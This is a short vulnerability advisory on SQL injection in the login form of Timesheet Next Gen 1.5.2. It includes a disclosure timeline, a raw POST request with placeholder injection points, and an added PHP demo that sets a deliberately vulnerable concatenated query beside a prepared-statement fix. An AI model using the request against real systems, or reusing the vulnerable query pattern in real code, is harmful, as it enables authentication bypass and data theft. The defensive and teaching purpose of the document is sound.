Timesheet Next Gen 1.5.2 Multiple SQLi



# Exploit Title: Timesheet Next Gen 1.5.2 Multiple SQLi
# Date: 02/23/12
# Author: G13
# Software Link: https://sourceforge.net/projects/tsheetx/
# Version: 1.5.2
# Category: webapps (php)
#

##### Vulnerability #####

The login.php page has multiple SQL injection vulnerabilities. Both the
'username' and 'password' parameters are vulnerable to SQL injection.

The vulnerability exists via the POST method.

##### Vendor Notification #####

02/23/12 - Vendor Notified
02/26/12 - Email sent to each developer, developer responds
02/29/12 - Confirmation by developer requested
03/02/12 - Disclosure

##### Exploit #####

http://localhost/timesheet/

POST /timesheet/login.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:10.0.2) Gecko/20100101 Firefox/10.0.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://localhost/timesheet/login.php
Cookie: PHPSESSID=3b624f789e37fa3bdade432da
Content-Type: application/x-www-form-urlencoded
Content-Length: 52

redirect=&username=[SQLi]&password=[SQLi]&Login=submit
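
Added example, not part of the original advisory and not Timesheet Next Gen code: a login check that concatenates both POST fields into the SQL text, next to a form that binds the username as a parameter and keeps the password out of SQL entirely. The table layout, function names and sample account are assumptions made for illustration; it uses PDO with an in-memory SQLite database so it runs on its own.

```php
<?php
// Hypothetical schema and function names; constructed sample data.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE users (username TEXT PRIMARY KEY, pw_hash TEXT NOT NULL)');
$ins = $db->prepare('INSERT INTO users (username, pw_hash) VALUES (?, ?)');
$ins->execute(["o'brien", password_hash('correct horse', PASSWORD_DEFAULT)]);

// Vulnerable pattern: both form fields become part of the SQL statement text,
// so any quote character in either field changes how the statement parses.
function login_concat(PDO $db, string $user, string $pass): bool {
    $sql = "SELECT 1 FROM users WHERE username = '$user' AND pw_hash = '$pass'";
    return (bool) $db->query($sql)->fetchColumn();
}

// Hardened pattern: the username is a bound parameter and the password is
// only ever compared in PHP against the stored hash, never placed in SQL.
function login_prepared(PDO $db, string $user, string $pass): bool {
    $stmt = $db->prepare('SELECT pw_hash FROM users WHERE username = :u');
    $stmt->execute([':u' => $user]);
    $hash = $stmt->fetchColumn();
    return is_string($hash) && password_verify($pass, $hash);
}

// Constructed form input: a legitimate user name that contains an apostrophe.
$post = ['username' => "o'brien", 'password' => 'correct horse'];

try {
    login_concat($db, $post['username'], $post['password']);
    echo "concat: statement executed\n";
} catch (PDOException $e) {
    // The apostrophe ended the string literal early: user input is being
    // parsed as SQL, which is the defect the advisory reports.
    echo "concat: input altered the statement: ", $e->getMessage(), "\n";
}

// The same input is handled as plain data by the prepared statement.
var_dump(login_prepared($db, $post['username'], $post['password']));
// A wrong password containing a quote is rejected without touching the SQL.
var_dump(login_prepared($db, $post['username'], "wrong' pass"));
```

A database error triggered by an ordinary apostrophe in a login field is a useful regression check: it should disappear once every query in the login path uses bound parameters.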
